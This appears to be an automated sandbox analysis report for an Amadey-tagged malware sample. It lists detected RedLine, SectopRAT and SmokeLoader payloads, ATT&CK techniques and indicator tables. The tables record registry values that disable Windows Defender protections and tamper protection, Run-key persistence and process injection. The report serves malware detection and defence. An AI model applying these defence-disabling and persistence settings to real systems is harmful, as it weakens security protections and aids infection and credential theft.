amadey | 894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	C96E.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	C96E.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	C96E.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	C96E.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	C96E.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	C96E.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 8 IoCs

resource	yara_rule
behavioral2/files/0x000600000002322c-83.dat	family_redline
behavioral2/memory/3020-85-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral2/files/0x000600000002322c-84.dat	family_redline
behavioral2/memory/3220-94-0x0000000000E10000-0x0000000000E4E000-memory.dmp	family_redline
behavioral2/files/0x0008000000023299-362.dat	family_redline
behavioral2/files/0x0008000000023299-368.dat	family_redline
behavioral2/memory/4292-369-0x0000000000CD0000-0x0000000000CEE000-memory.dmp	family_redline
behavioral2/memory/6052-381-0x00000000006D0000-0x000000000072A000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023299-362.dat	family_sectoprat
behavioral2/files/0x0008000000023299-368.dat	family_sectoprat
behavioral2/memory/4292-369-0x0000000000CD0000-0x0000000000CEE000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 5768 created 2556	5768	injector.exe	43
PID 5768 created 2556	5768	injector.exe	43
PID 5768 created 2556	5768	injector.exe	43
PID 5768 created 2556	5768	injector.exe	43
PID 5768 created 2556	5768	injector.exe	43

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	injector.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
5568	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	C45B.bat
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	CB25.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	F24.exe

Executes dropped EXE 26 IoCs

pid	Process
4984	C1E8.exe
3284	ZI4xM2Zd.exe
4168	C370.exe
1104	pG3rS0fl.exe
5020	Hf8Mh2Uh.exe
4296	Lq5hq4TW.exe
3568	cmd.exe
3708	C45B.bat
4540	C854.exe
4696	C96E.exe
1656	CB25.exe
3220	2NB190Af.exe
4932	explothe.exe
5456	F24.exe
5572	toolspub2.exe
5632	31839b57a4f11171d6abc8bbc4451ee4.exe
5696	source1.exe
5768	latestX.exe
5708	explothe.exe
5852	toolspub2.exe
6052	3FCA.exe
732	423C.exe
4292	43A5.exe
1504	31839b57a4f11171d6abc8bbc4451ee4.exe
5604	updater.exe
5748	csrss.exe

Loads dropped DLL 3 IoCs

pid	Process
6052	3FCA.exe
6052	3FCA.exe
4544	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	C96E.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	C1E8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	ZI4xM2Zd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	pG3rS0fl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Hf8Mh2Uh.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	Lq5hq4TW.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4696 set thread context of 3020	4696	894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe	88
PID 4168 set thread context of 3804	4168	C370.exe	108
PID 3568 set thread context of 3472	3568	cmd.exe	110
PID 4540 set thread context of 3020	4540	C854.exe	120
PID 5572 set thread context of 5852	5572	toolspub2.exe	162
PID 5696 set thread context of 5592	5696	source1.exe	173

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	injector.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\rss\csrss.exe	31839b57a4f11171d6abc8bbc4451ee4.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5420	sc.exe
5172	sc.exe
3300	sc.exe
5372	sc.exe
4480	sc.exe
636	sc.exe
5056	sc.exe
2824	sc.exe
1396	sc.exe
452	sc.exe
5128	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
1096	4696	WerFault.exe	84
2148	4168	WerFault.exe	102
2788	3568	WerFault.exe	106
4516	4540	WerFault.exe	113
5684	6052	WerFault.exe	165

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2376	schtasks.exe
3120	schtasks.exe
4988	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3020	AppLaunch.exe
3020	AppLaunch.exe
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE
2556	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2556	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3020	AppLaunch.exe
5852	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeDebugPrivilege	4696	C96E.exe
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeDebugPrivilege	5696	source1.exe
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeDebugPrivilege	5992	powershell.exe
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeDebugPrivilege	4292	43A5.exe
Token: SeDebugPrivilege	732	423C.exe
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE
Token: SeCreatePagefilePrivilege	2556	Explorer.EXE
Token: SeShutdownPrivilege	2556	Explorer.EXE

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe
1500	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4696 wrote to memory of 4140	4696	894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe	87
PID 4696 wrote to memory of 4140	4696	894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe	87
PID 4696 wrote to memory of 4140	4696	894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe	87
PID 4696 wrote to memory of 3020	4696	894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe	88
PID 4696 wrote to memory of 3020	4696	894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe	88
PID 4696 wrote to memory of 3020	4696	894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe	88
